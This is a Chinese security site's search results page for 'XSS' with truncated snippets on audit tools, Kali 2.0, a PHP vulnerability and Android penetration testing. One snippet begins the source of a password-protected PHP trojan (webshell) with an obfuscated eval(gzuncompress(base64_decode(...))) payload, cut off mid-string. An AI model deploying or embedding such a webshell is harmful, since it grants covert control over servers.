搜索 “XSS”

刚好这两天对之前github上关注的一些比较有意思的项目进行了一下分类整理，在这里列出来分享给大家，希望能对大家寻找工具或者资源有所帮助。 大部分Repo是关于网络安全以及Python的，也有一些其他主题的项目，有很多我都没有用过，关于项目的功能概括如果写的有不对的地方，还请大家多多包涵，给予指正。 欢迎组团欢迎一起学习交流！转载请...

0x01 简介 工欲善其事，必先利其器。在源代码的静态安全审计中，使用自动化工具代替人工漏洞挖掘，可以显著提高审计工作的效率。学会利用自动化代码审计工具，是每一个代码审计人员必备的能力。在学习PHP源代码审计的过程中，本人搜集使用了多款自动化工具。本文将简要介绍其中三款比较实用的工具：RIPS、VCG、Fortify SCA。 RIPS是一款开源...

PHP <?php /** * Created by uedbox.com. * User: hackgyj * Date: 15/10/28 * Time: 下午8:59 */ $admin['pass'] = "lqx"; //设置密码 $notice = "<FONT color=#ff3300>Crack8_PHP木马</font>"; //设置版权 eval(gzuncompress(base64_decode("eJzsffl3G8eR8M/0e/4fRhOuAJog...

Kali 2.0昨天已经在BlackHat 2015 USA上正式发布了。无论是粉丝们还是Kali官方都对这个2.0版本抱有极大的期待和热情。这是第一个基于Debian Jessie的Kali版本，此次升级最大的特点就是系统界面的设计理念更加先进，以及系统的升级方式变为滚动升级。 官方的Kali2.0介绍 1.将会保持滚动升级。 这是Kali 2.0最...

据说是某数字公司的应急给发布出来了.群里面的小伙伴都惊呆了 具体的漏洞分析看：http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x03.txt 其中的 PHP 在《高级PHP应用程序漏洞审核技术》[1]一文里的"魔术引号带来的新的安全问题"一节里，有 提到通过提取魔术引号产生的“\”字符带来的安全问题，同样这个问题...

前话 当我们连入一个莫名的WIFI，除了上网，还能干些什么？ 当然是渗透！已不至于只能上网 Android传承着Linux的血统，无疑使 渗透 从机器端到各种终端，使用起来更加方便，工具集中了众多方法，大大提高了渗透的效率（当然 不推荐傻瓜式工具，这里只是入门，高手勿喷，初学者了解） 大名鼎鼎的dsploit 地址: http://dsploit.net/ 演示视频...